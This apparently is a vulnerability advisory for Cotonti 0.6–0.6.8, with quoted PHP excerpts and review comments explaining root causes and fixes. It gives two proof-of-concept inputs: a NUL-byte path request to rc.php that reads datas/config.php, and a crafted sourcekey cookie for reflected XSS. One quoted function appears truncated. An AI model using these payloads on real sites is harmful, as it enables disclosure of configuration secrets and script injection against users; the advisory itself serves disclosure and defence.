
01.07.2010, 12:44
Cotonti (0.6 - 0.6.8)
http://www.cotonti.com/downloads/releases/
File Disclosure
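magic_quotes = Off (precondition: with magic quotes enabled, the NUL byte in the request below would be escaped before rc.php uses it)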
File: rc.php
PHP код:
// Excerpt from rc.php as quoted in the advisory; each "..." line marks code the author left out.
// Root cause: the path to serve comes straight from the query string, with no
// normalisation, no base-directory restriction and no allow-list of servable files.
$src_uri = $_GET['uri'];
// Only existence is tested, so any path the PHP process can resolve passes this check.
if (!file_exists($src_uri)) {
    header('HTTP/1.1 404 Not Found');
    echo('HTTP 404 - Not Found');
    exit;
}
...
// The content-type lookup is the only restriction visible in this excerpt.
// NOTE(review): how $file_extension is derived is elided; presumably it is cut from the
// requested string, so it describes what the client typed, not the file that is opened.
// Confirm against the release source.
if (!isset($known_content_types[$file_extension])) {
    header('HTTP/1.1 403 Forbidden');
    echo('HTTP 403 - Forbidden');
    exit;
}
...
// The request value is copied unchanged; nothing in the lines shown rewrites it.
$dst_uri = $src_uri;
...
// readfile() streams whatever the path resolves to. PHP builds before 5.3.4 cut a path
// at an embedded NUL byte in filesystem calls, so the extension that was checked and the
// file that is read can differ. Mitigation: reject NUL bytes, resolve the path with
// realpath() and require the result to sit inside the intended resource directory
// before reading it.
readfile($dst_uri);
Код:
http://site/rc.php?uri=datas/config.php%00.js
Passive XSS (reflected: the value of the sourcekey cookie is used without validation)
File: system/common.php
PHP код:
// Excerpt from system/common.php as quoted in the advisory: initialises $sys['xk'].
// No 'sourcekey' cookie yet: generate a value server-side, prepare the SQL fragment
// that stores it as user_sid, and send it to the client as a cookie.
if (empty($_COOKIE['sourcekey']))
{
    $sys['xk'] = mb_strtoupper(sed_unique(8));
    $update_sid = ", user_sid = '{$sys['xk']}'";
    // NOTE(review): the last two arguments look like the secure and HttpOnly flags -
    // confirm against sed_setcookie().
    sed_setcookie('sourcekey', $sys['xk'], time()+$cfg['cookielifetime'], $cfg['cookiepath'],
        $cfg['cookiedomain'], $sys['secure'], true);
}
else
{
    // The client-supplied cookie is accepted verbatim: no length or character-set check
    // and no comparison with a value stored on the server. Every later use of $sys['xk']
    // therefore handles untrusted data and must escape it for its output context;
    // validating the cookie here against the format sed_unique() produces would stop
    // arbitrary values at the source.
    $sys['xk'] = $_COOKIE['sourcekey'];
    $update_sid = '';
}
File: system/functions.php
PHP код:
/**
 * Excerpt from system/functions.php as quoted in the advisory.
 *
 * NOTE(review): the returned string literal is empty in this listing, yet the function
 * declares global $sys. The original literal was presumably HTML embedding $sys['xk']
 * that was lost when the post was rendered - verify against the release source. If so,
 * the value must pass through htmlspecialchars() with ENT_QUOTES before it is written
 * into an attribute.
 */
function sed_xp()
{
    global $sys;
    return '';
}
Код:
COOKIE
sourcekey = ">123